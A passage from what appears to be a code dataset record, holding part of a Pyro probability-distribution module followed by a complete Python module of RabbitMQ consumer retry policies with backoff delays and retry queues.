result should be `self.shape()`.\n :rtype: torch.Tensor\n \"\"\"\n return self.rsample(sample_shape) if self.has_rsample else self.sample(sample_shape)\n\n @property\n def event_dim(self):\n \"\"\"\n :return: Number of dimensions of individual events.\n :rtype: int\n \"\"\"\n return len(self.event_shape)\n\n def shape(self, sample_shape=torch.Size()):\n \"\"\"\n The tensor shape of samples from this distribution.\n\n Samples are of shape::\n\n d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: Tensor shape of samples.\n :rtype: torch.Size\n \"\"\"\n return sample_shape + self.batch_shape + self.event_shape\n\n def expand(self, batch_shape):\n \"\"\"\n Expands a distribution to a desired\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n Note that this is more general than :meth:`expand_by` because\n ``d.expand_by(sample_shape)`` can be reduced to\n ``d.expand(sample_shape + d.batch_shape)``.\n\n :param torch.Size batch_shape: The target ``batch_shape``. 
This must\n compatible with ``self.batch_shape`` similar to the requirements\n of :func:`torch.Tensor.expand`: the target ``batch_shape`` must\n be at least as long as ``self.batch_shape``, and for each\n non-singleton dim of ``self.batch_shape``, ``batch_shape`` must\n either agree or be set to ``-1``.\n :return: An expanded version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n batch_shape = list(batch_shape)\n if len(batch_shape) < len(self.batch_shape):\n raise ValueError(\"Expected len(batch_shape) >= len(self.batch_shape), \"\n \"actual {} vs {}\".format(len(batch_shape), len(self.batch_shape)))\n # check sizes of existing dims\n for dim in range(-1, -1 - len(self.batch_shape), -1):\n if batch_shape[dim] == -1:\n batch_shape[dim] = self.batch_shape[dim]\n elif batch_shape[dim] != self.batch_shape[dim]:\n if self.batch_shape[dim] != 1:\n raise ValueError(\"Cannot broadcast dim {} of size {} to size {}\".format(\n dim, self.batch_shape[dim], batch_shape[dim]))\n else:\n raise NotImplementedError(\"https://github.com/uber/pyro/issues/1119\")\n sample_shape = batch_shape[:len(batch_shape) - len(self.batch_shape)]\n return self.expand_by(sample_shape)\n\n def expand_by(self, sample_shape):\n \"\"\"\n Expands a distribution by adding ``sample_shape`` to the left side of\n its :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n To expand internal dims of ``self.batch_shape`` from 1 to something\n larger, use :meth:`expand` instead.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn\n from the distribution.\n :return: An expanded version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n return ReshapedDistribution(self, sample_shape=sample_shape)\n\n def reshape(self, sample_shape=None, extra_event_dims=None):\n raise Exception('''\n .reshape(sample_shape=s, extra_event_dims=n) was renamed and split into\n .expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).''')\n\n def independent(self, reinterpreted_batch_ndims=None):\n \"\"\"\n Reinterprets the ``n`` rightmost dimensions of this distributions\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`\n as event dims, adding them to the left side of\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n Example::\n\n >>> [d1.batch_shape, d1.event_shape]\n [torch.Size((2, 3)), torch.Size((4, 5))]\n >>> d2 = d1.independent(1)\n >>> [d2.batch_shape, d2.event_shape]\n [torch.Size((2,)), torch.Size((3, 4, 5))]\n >>> d3 = d1.independent(2)\n >>> [d3.batch_shape, d3.event_shape]\n [torch.Size(()), torch.Size((2, 3, 4, 5))]\n\n :param int reinterpreted_batch_ndims: The number of batch dimensions\n to reinterpret as event dimensions.\n :return: A reshaped version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n # TODO return pyro.distributions.torch.Independent(self, reinterpreted_batch_ndims)\n return ReshapedDistribution(self, reinterpreted_batch_ndims=reinterpreted_batch_ndims)\n\n def mask(self, mask):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distributions :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n :return: A masked copy of this distribution.\n :rtype: :class:`MaskedDistribution`\n \"\"\"\n return MaskedDistribution(self, mask)\n\n\nclass 
TorchDistribution(torch.distributions.Distribution, TorchDistributionMixin):\n \"\"\"\n Base class for PyTorch-compatible distributions with Pyro support.\n\n This should be the base class for almost all new Pyro distributions.\n\n .. note::\n\n Parameters and data should be of type :class:`~torch.Tensor`\n and all methods return type :class:`~torch.Tensor` unless\n otherwise noted.\n\n **Tensor Shapes**:\n\n TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n\n Pyro follows the same distribution shape semantics as PyTorch. It distinguishes\n between three different roles for tensor shapes of samples:\n\n - *sample shape* corresponds to the shape of the iid samples drawn from the distribution.\n This is taken as an argument by the distribution's `sample` method.\n - *batch shape* corresponds to non-identical (independent) parameterizations of\n the distribution, inferred from the distribution's parameter shapes. This is\n fixed for a distribution instance.\n - *event shape* corresponds to the event dimensions of the distribution, which\n is fixed for a distribution class. These are collapsed when we try to score\n a sample from the distribution via `d.log_prob(x)`.\n\n These shapes are related by the equation::\n\n assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n Distributions provide a vectorized\n :meth`~torch.distributions.distribution.Distribution.log_prob` method that\n evaluates the log probability density of each event in a batch\n independently, returning a tensor of shape\n ``sample_shape + d.batch_shape``::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n log_p = d.log_prob(x)\n assert log_p.shape == sample_shape + d.batch_shape\n\n **Implementing New Distributions**:\n\n Derived classes must implement the methods\n :meth:`~torch.distributions.distribution.Distribution.sample`\n (or :meth:`~torch.distributions.distribution.Distribution.rsample` if\n ``.has_rsample == True``) and\n :meth:`~torch.distributions.distribution.Distribution.log_prob`, and must\n implement the properties\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`,\n and :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n Discrete classes may also implement the\n :meth:`~torch.distributions.distribution.Distribution.enumerate_support`\n method to improve gradient estimates and set\n ``.has_enumerate_support = True``.\n \"\"\"\n pass\n\n\nclass ReshapedDistribution(TorchDistribution):\n \"\"\"\n Reshapes a distribution by adding ``sample_shape`` to its total shape\n and adding ``reinterpreted_batch_ndims`` to its\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn from\n the distribution.\n :param int reinterpreted_batch_ndims: The number of extra event dimensions that will\n be considered dependent.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, sample_shape=torch.Size(), reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape):\n raise ValueError('Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), '\n 'actual {} vs {}'.format(reinterpreted_batch_ndims,\n len(sample_shape + base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n 
self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape, reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims + reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape, reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape + self.sample_shape)\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() - self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() - self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\"Pyro does not enumerate over cartesian products\")\n\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n\n # Shift enumeration dim to correct location.\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape) != base_dist.batch_shape:\n raise 
ValueError(\"Expected mask.shape to be broadcastable to base_dist.batch_shape, \"\n \"actual {} vs {}\".format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape, base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-ids": [
27,
35,
36,
39,
44
]
}
|
[
27,
35,
36,
39,
44
] |
# -*- coding: utf-8 -*-
"""
Nothing is perfect: errors and timeouts may happen, and when such failures happen, the
consumer has to decide what to do about them. By default, the consumer rejects the
envelope (RabbitMQ message) when a failure happens. However, error and timeout
issues, unless there is a software bug, are usually solved with retries. Just like
routing, the consumer doesn't make the retry decision itself; it delegates that
decision to a retry policy. A retry policy defines how the retry is performed. Retries
usually happen with back-offs to avoid worsening the situation by hammering other
services with more requests, especially if the failure was a timeout. The consumer can be
configured to use a retry policy by calling :meth:`.Consumer.set_retry_policy`, passing
an instance of :class:`.RetryPolicy`. When a retry policy is set, the consumer won't
reject messages; rather, it sends them to the retry policy, which deals with the
situation in its :meth:`.RetryPolicy.retry` method. Based on its implementation,
the retry policy decides how retries are performed.
There are 4 different retry policies available:
1. :class:`.UnlimitedRetriesPolicy`, Unlimited retries policy
2. :class:`.LimitedRetriesPolicy`, Limited retries policy
3. :class:`.FixedDelayUnlimitedRetriesPolicy`, Fixed delay unlimited retries policy
4. :class:`.FixedDelayLimitedRetriesPolicy`, Fixed delay limited retries policy
Custom retry policies can be created by subclassing the base class
:class:`.RetryPolicy`
"""
import logging
logger = logging.getLogger(__name__)
class RetryPolicy(object):
"""Base class for retry policies.
Subclasses MUST implement the :meth:`retry` method.
"""
def __init__(self, **kwargs):
# type: (RetryPolicy) -> None
super(RetryPolicy, self).__init__()
def retry(self, envelope):
# type: (RetryPolicy, Envelope) -> None
"""This method is implemented by the subclass."""
raise NotImplementedError()
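# Sketch of a custom policy (illustrative; assumes the consumer exposes a pika-style
# ``channel`` as used elsewhere in this module):
#
#     class DropPolicy(RetryPolicy):
#         """Give up immediately: reject failed messages without requeueing."""
#
#         def __init__(self, consumer, **kwargs):
#             super(DropPolicy, self).__init__(**kwargs)
#             self.consumer = consumer
#
#         def retry(self, envelope):
#             # Reject the message; RabbitMQ will not redeliver it.
#             self.consumer.channel.basic_reject(envelope.delivery_tag, requeue=False)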
class BaseRetryPolicy(RetryPolicy):
"""Base retry policy class for :class:`.UnlimitedRetriesPolicy` and
:class:`.LimitedRetriesPolicy`.
It provides implementations for getting the message death count and for retry queue creation.
"""
def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):
# type: (BaseRetryPolicy, Consumer, str) -> None
"""
:param Consumer consumer: message consumer instance
:param str retry_queue_suffix: Suffix used when creating retry queues. Retry
queue names are constructed in this form "queue_name.<suffix>.<delay>".
Optional, defaults to ``retry``
"""
super(BaseRetryPolicy, self).__init__(**kwargs)
retry_queue_suffix = retry_queue_suffix.strip()
self.consumer = consumer
assert len(retry_queue_suffix) > 0
self.retry_queue_suffix = retry_queue_suffix
# To avoid frequent retry queue creation and destruction for low retry delays
self.min_retry_queue_ttl = 20 * 1000 # 20 seconds
def set_original_delivery_info_header(self, envelope):
# type: (BaseRetryPolicy, Envelope) -> None
"""Save original message delivery infomation in a header."""
if not envelope.get_header('x-original-delivery-info'):
original_delivery_info = {
'consumer_tag': envelope.delivery_info.consumer_tag,
'delivery_tag': envelope.delivery_info.delivery_tag,
'redelivered': envelope.delivery_info.redelivered,
'exchange': envelope.delivery_info.exchange,
'routing_key': envelope.delivery_info.routing_key
}
envelope.set_header('x-original-delivery-info',
original_delivery_info)
def get_death_count(self, envelope):
# type: (BaseRetryPolicy, Envelope) -> int
"""Return the death count of a message by examining "x-death" header.
:param Envelope envelope: Message envelope
:return int: death count
"""
death_header = envelope.get_header('x-death')
if death_header is None:
return 0
count = 0
for death in death_header:
if not death['queue'].startswith(self.consumer.queue_name):
continue
count += death.get('count', 1)
return count
def declare_retry_queue(self, delay):
# type: (BaseRetryPolicy, int) -> str
"""Declare a retry queue for the provided delay.
Each different delay has a different queue where all retry messages with the
same delay will be sent to till they expire and get sent back to the original
queue for handling retry. The queue is declared with a TTL and automatically
gets deleted. The queue TTL is equal to the provided delay. The retry
queue's dead letter exchange is (default) direct exchange and the dead letter
routing key is the original queue name where the messages originally
came from. The messages will be sent back to the original queue when they
reach their TTL, for handling retry.
        The retry queue is redeclared before each new message is sent to it.
        Redeclaration resets the queue's expiry timer, preventing it from being deleted.
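        For illustration, assuming the consumer's queue is named ``orders`` and the
        default ``retry`` suffix, a 5 second delay produces a retry queue named
        ``orders.retry.5000`` with a message TTL of 5000 ms and a queue expiry of at
        least 20000 ms (the 20 second minimum).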
:param int delay: Retry delay in seconds
:return: retry queue name
:rtype: str
"""
delay_in_ms = int(delay * 1000)
retry_queue_name = '{}.{}.{}'.format(
self.consumer.queue_name, self.retry_queue_suffix, delay_in_ms)
        # Avoid frequent queue creation and destruction for short retry delays
queue_ttl = delay_in_ms * 2
if queue_ttl < self.min_retry_queue_ttl:
queue_ttl = self.min_retry_queue_ttl
self.consumer.channel.queue_declare(
callback=None,
queue=retry_queue_name,
durable=self.consumer.durable,
nowait=True,
arguments={
'x-dead-letter-exchange': '',
'x-dead-letter-routing-key': self.consumer.queue_name,
'x-message-ttl': delay_in_ms,
'x-expires': queue_ttl
})
logger.warning(
'Retry queue "{}" is created/redeclared'.format(retry_queue_name))
return retry_queue_name
class UnlimitedRetriesPolicy(BaseRetryPolicy):
"""Unlimited Retries Policy.
    This is an implementation of :class:`.RetryPolicy` which performs incremental
    backoff with unlimited retries.
:attr:`initial_delay`: is the initial/first backoff delay in seconds
    :attr:`delay_incremented_by`: is the number of seconds the backoff is incremented
    by after each death
    :attr:`max_delay`: is the final/maximum backoff delay in seconds that should not be
    exceeded
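    For example, with ``initial_delay=5``, ``delay_incremented_by=10`` and
    ``max_delay=60``, the successive retry delays are 5, 15, 25, 35, 45, 55 and then
    60 seconds for every retry after that.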
"""
def __init__(self,
consumer,
initial_delay,
max_delay,
delay_incremented_by,
retry_queue_suffix='retry',
**kwargs):
# type: (UnlimitedRetriesPolicy, Consumer, int, int, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int initial_delay: `initial_delay` is the initial/first backoff delay
in seconds.
        :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds
            that should not be exceeded; when the computed delay exceeds it, this max is used.
        :param int delay_incremented_by: `delay_incremented_by` is the number of seconds
            the backoff should be incremented by after each death.
        :param str retry_queue_suffix: suffix used when naming retry queues.
"""
super(UnlimitedRetriesPolicy,
self).__init__(consumer, retry_queue_suffix, **kwargs)
assert initial_delay >= 0
assert delay_incremented_by >= 0
assert max_delay >= initial_delay
self.initial_delay = initial_delay
self.max_delay = max_delay
self.delay_incremented_by = delay_incremented_by
def retry(self, envelope):
# type: (UnlimitedRetriesPolicy, Envelope) -> None
"""Send message to retry queue to retry handling it later.
        Death count is calculated by examining the 'x-death' header. Based on the death
        count, the message is sent to a retry queue where it waits until it expires and
        is sent back to the original queue for another handling attempt.
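        The delay is computed as ``initial_delay + death_count * delay_incremented_by``
        and capped at ``max_delay``.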
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
delay = self.initial_delay + (death_count * self.delay_incremented_by)
if delay > self.max_delay:
delay = self.max_delay
retry_queue_name = self.declare_retry_queue(delay)
# Save original delivery information
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(
exchange='',
routing_key=retry_queue_name,
properties=envelope.properties,
body=envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.format(
envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
"""Limited Retries Policy.
    This is an implementation of :class:`.RetryPolicy` which performs incremental
    backoff with a limited number of retries.
:attr:`consumer`: message consumer instance
    :attr:`retry_delays`: immutable list of retry backoff delays in seconds. The message
    is sent to the dead letter exchange (dlx) when this list is exhausted,
    e.g. ``(1, 5, 10, 60, 5 * 60)``
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
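    A construction sketch (``consumer`` is assumed to be an existing consumer
    instance and the delay values are only illustrative)::

        policy = LimitedRetriesPolicy(consumer, retry_delays=(1, 5, 10, 60, 5 * 60))

    With these delays a message is retried at most five times before being rejected.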
"""
def __init__(self,
consumer,
retry_delays,
retry_queue_suffix='retry',
**kwargs):
# type: (LimitedRetriesPolicy, Consumer, Iterable[int], str) -> None
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
        :param str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer, retry_queue_suffix,
**kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
# type: (LimitedRetriesPolicy, Envelope) -> None
"""Send message to retry queue to retry handling it later.
        Death count is calculated by examining the 'x-death' header. Based on the death
        count, the message is sent to a retry queue where it waits until it expires and
        is sent back to the original queue for another handling attempt.
        The death count is used as an index into the `retry_delays` list, where each
        item represents a retry delay in seconds.
        The message is rejected if the death count exceeds the length of the
        `retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
# Save original delivery information
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(
exchange='',
routing_key=retry_queue_name,
properties=envelope.properties,
body=envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.format(
envelope.message_id, delay, death_count + 1))
else:
logger.warning(
'Message [{}] exceeded retry limit; death count: {}'.format(
envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(
envelope.delivery_tag, requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id))
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
    This is an implementation of :class:`.RetryPolicy` which uses a fixed backoff
    delay with unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
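    A construction sketch (``consumer`` is assumed to exist; the delay value is only
    illustrative)::

        policy = FixedDelayUnlimitedRetriesPolicy(consumer, delay=30)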
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
# type: (FixedDelayUnlimitedRetriesPolicy, Consumer, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
        :param str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(
consumer=consumer,
initial_delay=delay,
max_delay=delay,
delay_incremented_by=0,
retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
    This is an implementation of :class:`.RetryPolicy` which uses a fixed backoff
    delay with a limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
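    A construction sketch (``consumer`` is assumed to exist; the values are only
    illustrative)::

        policy = FixedDelayLimitedRetriesPolicy(consumer, delay=10, retries_limit=5)

    This retries a failed message at most five times, ten seconds apart.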
"""
def __init__(self,
consumer,
delay,
retries_limit,
retry_queue_suffix='retry',
**kwargs):
# type: (FixedDelayLimitedRetriesPolicy, Consumer, int, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
        :param str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(
consumer=consumer,
retry_delays=retry_delays,
retry_queue_suffix=retry_queue_suffix,
**kwargs)
|
normal
|
{
"blob_id": "848934680253ff2950db7723b1fe82b2ae799900",
"index": 801,
"step-1": "<mask token>\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n <mask token>\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n 
\"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-2": "<mask token>\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n <mask token>\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. 
